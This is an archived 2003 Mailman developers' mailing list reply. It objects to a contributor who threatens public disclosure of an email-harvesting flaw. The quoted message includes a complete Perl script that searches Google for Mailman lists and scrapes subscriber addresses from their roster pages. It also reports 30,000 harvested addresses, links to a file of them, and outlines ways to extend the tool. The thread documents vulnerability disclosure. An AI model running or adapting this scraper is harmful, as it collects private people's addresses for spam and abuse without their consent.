[Mailman-Developers] bugtraq submission warning: email address harvesting exploit

Richard Barrett r.barrett at openinfo.co.uk
Tue Nov 25 13:49:40 EST 2003

On 25 Nov 2003, at 17:46, Bernhard Kuemel wrote:

> David Champion wrote:
>> * On 2003.11.16, in <3FB78C1A.5080702 at gmx.at>,
>>> This test may disable users of non graphical web browers or email  
>>> only subscribers to subscribe.
>> I've generally found that encoding the address as HTML character
>> entities works fine. I've had a bait address on my web page for quite
>> some time, and it's never received any spam. It's readable to text
>> browsers, it doesn't affect readability with unexpected font sizes, it
>> takes little computation, and it's trivial to write.
>> My address would become:
>> &#100;&#103;&#99;&#64;&#117;&#99;&#104;&#105;&#99;&#97;&#103;&#111; 
>> &#46;&#101;&#100;&#117;
> While this approach may work in individual cases it is trivially and  
> quite likely defeatet when the prize is 100,000 mailing lists with 1  
> to 5 million (!) high quality email addresses.
> Since your answer is the only one and the problem does not appear to  
> be addressed sufficiently I wrote an example exploit program that  
> finds mailman lists and harvests their email addresses. After about 20  
> minutes it collected about 30.000 email addresses:  
> http://bksys.at/bernhard/30,000%20email%20addresses.gz
> The program can be further improved. It can be a little parallelized.  
> It can check a site for further mailing lists (the admin overview has  
> a more complete list than the listinfo overview). And it can be made  
> to subscribe to mailing lists where the member list is only available  
> to the list members.
> If you think the problem is worth fixing please estimate how long it  
> will take and I will wait a reasonable time for a fix before I post  
> the problem and the exploit code to bugtraq. Otherwise I will post to  
> bugtraq in about 1 week.

I am just a spectator but this doesn't look like a major contribution  
to the Open Source movement by you.

As a way of getting your code and ideas adopted it is one hell of an  

A better approach might be to work up a patch for the current Mailman  
release that will demonstrably function in practice (how are we going  
to manage all those images your original "Turing test"  proposal will  
lead to) and submit that like any other contributor. You can program in  
Perl so using Python should be a snap for a clever fellow like you.

But I confess if it were for me to decide on a response to your  
threats, which it is not, I'd say sex and travel fits the bill.

> Here is the exploit code:
> -------------------------------------------------------------
> #!/usr/bin/perl -w
> $n=0;
> $u=0;
> for ($i=0;1;$i+=10) {
>         $#urls=-1;
>         $google=`lynx --dump  
> 'http://www.google.com/search? 
> q=%22Click+here+for+the+list%22+%22batched+in+a+daily+digest%22&start=$ 
> i'`;
> #       print $google;
>         @urls=$google=~/cache:.{12}:(.*?)\+%22/g;
>         if ($#urls==-1) {last;}
> #       print join("\n", at urls);
> #       print "\naoeu $#urls\n";
>         foreach $url (@urls) {
>                 $u++;
>                 $url=~s*/listinfo/*/roster/*;
>                 print "$url...\n";
>                 $roster=`lynx -connect_timeout=10 -dump $url`;
>         #       print $roster;
>                 @mails=$roster=~/^ +\* \(?\[\d+\](.* at .*?)\)?$/mgo;
>                 foreach $mail (@mails) {
>                         $mail=~s/ at /@/;
>                         print "$mail\n";
>                         $n++;
>                 }
>         print "mails=".($#mails+1).", total=$n, url=$u, google=$i\n";
> #               exit;
>         } #foreach url
> } #while google
> -----------------------------------------------------------
> Have a nice day,

There's irony for you.

> Bernhard
> -- 
> Webspace; Low end Serverhousing ab 15 e, etc.: http://www.bksys.at
> Linux Admin/Programmierer: http://bksys.at/bernhard/services.html
Richard Barrett                               http://www.openinfo.co.uk

More information about the Mailman-Developers mailing list